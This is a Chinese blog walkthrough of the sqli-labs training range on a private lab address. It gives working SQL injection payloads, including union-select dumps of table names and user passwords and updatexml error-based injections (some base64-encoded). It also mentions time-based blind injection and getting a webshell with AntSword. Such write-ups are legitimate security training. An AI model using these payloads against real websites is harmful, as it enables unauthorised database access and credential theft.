SQLI靶场进阶

最新推荐文章于 2024-04-16 22:46:11 发布

Hero.Youth

最新推荐文章于 2024-04-16 22:46:11 发布

阅读量687

点赞数

分类专栏： # 靶场与工具文章标签：安全

本文链接：https://blog.csdn.net/ppbgi/article/details/114547534

版权

靶场与工具专栏收录该内容

6 篇文章 1 订阅

订阅专栏

第一关：

字符型
1、

http://192.168.101.199/sqli-labs-master/Less-1/
?id=1 and 1=2  //不报错，说明不是数字型

http://192.168.101.199/sqli-labs-master/Less-1/
?id=1' and 1=2  //报错，说明是字符型

在这里插入图片描述

2、进行列数的猜解

http://192.168.101.199/sqli-labs-master/Less-1/
?id=1' order by 3 --+

3、进行库名，表名，列名的爆出

http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,2,3  --+

http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,2,database()  --+

http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,2,group_concat(0x7e,table_name) from information_schema.tables where table_schema=database()  --+


http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,group_concat(0x7e,table_name),group_concat(0x7e,column_name) from information_schema.columns where table_schema=database()  --+

//进行users用户的密码爆出
http://192.168.101.199/sqli-labs-master/Less-1/
?id=-1' union select 1,username,password from users  --+

第二关

数字型

//报错，说明是数字型
http://192.168.101.199/sqli-labs-master/Less-2/
?id=1 and 1=2

进行数据库，表，列的爆出【原理同字符型】

第三关

http://192.168.101.199/sqli-labs-master/Less-3/
?id=1 and 1=2  //不报错，证明不是数字型

http://192.168.101.199/sqli-labs-master/Less-3/
?id=1' and 1=2

在这里插入图片描述
报错信息中含有右括号，猜想可能与括号有关

找到可以闭合的字符

进行库、表、列的爆出：

四

在这里插入图片描述

发现有扩号，尝试闭合：

在这里插入图片描述
进行列数的猜解，得到3列：

在这里插入图片描述
进行数据库名的获取：

表名的获取：

进行列名的信息获取：

获取用户数据：

在这里插入图片描述

五、

在这里插入图片描述

发现无回显，所以用bp来获取数据库信息：

六

在这里插入图片描述
测试出存在注入

数据库存在3列

其他与第五关操作一致！

七

在这里插入图片描述

在这里插入图片描述
源码中使用文件，所以利用文件来进行注入：

在这里插入图片描述

在这里插入图片描述
注意post必须大写小写是无法连接蚁剑的
在用蚁剑链接获取shell

八

在这里插入图片描述

九

在进行注入测试时，无论输入怎样的闭合符号，页面均无变化，于是查看源码，发现是字符型的，使用单引号进行闭合；因为无论输入什么均无变化，使用时间盲注进行测试：
在这里插入图片描述

在这里插入图片描述

于是使用BP进行抓包处理：
在这里插入图片描述

在这里插入图片描述
其他同上！

十

在进行类型判断时，发现无论怎么输入，都没有任何的回显，所以利用sleep()来进行判断：
在这里插入图片描述

然后进行数据库的信息获取：

利用BP抓包获取：

其他同上！

十一、

在这里插入图片描述

十二、

在这里插入图片描述

十三

在这里插入图片描述

在这里插入图片描述
发现此关是无回显的，进行抓包

在这里插入图片描述

在这里插入图片描述
然后抓包获取用户名与密码！

十四

在这里插入图片描述

在这里插入图片描述

同上！

十五

在这里插入图片描述

在这里插入图片描述
其他同上！

十六

在这里插入图片描述

其他同上！

十七

在这里插入图片描述

在这里插入图片描述
发现order by 被禁止了

sleep函数也难逃一劫
然后进行报错注入的尝试

发现group让禁止了，所以只能使用limit来进行一一列举
在这里插入图片描述
其他同上！

十八

在这里插入图片描述
发现与我们的ua头一样，在看源码中对ua头的调用，所以进行抓包进行测试：

在这里插入图片描述

其他同上！

十九

在这里插入图片描述

在这里插入图片描述
其他同上！

二十

在这里插入图片描述

其他同上！

二十一

在这里插入图片描述

//base64加密payload
YWRtaW4xJyAgIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDAsMSkgKSwxKSAgYW5kICcg=

//payload 
admin1'   and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1) ),1)  and '

其他同上！

二十二

在这里插入图片描述

//base64 加密
YWRtaTFuIiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpKSwxKSBhbmQgIiAj
//payload
admi1n" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1) and " #

其他同上！

进阶2链接

Hero.Youth

关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
SQLI靶场进阶

第一关：字符型1、http://192.168.101.199/sqli-labs-master/Less-1/?id=1 and 1=2 //不报错，说明不是数字型http://192.168.101.199/sqli-labs-master/Less-1/?id=1' and 1=2 //报错，说明是字符型2、进行列数的猜解http://192.168.101.199/sqli-labs-master/Less-1/?id=1' order by 3 --+3、进行库
复制链接

扫一扫

专栏目录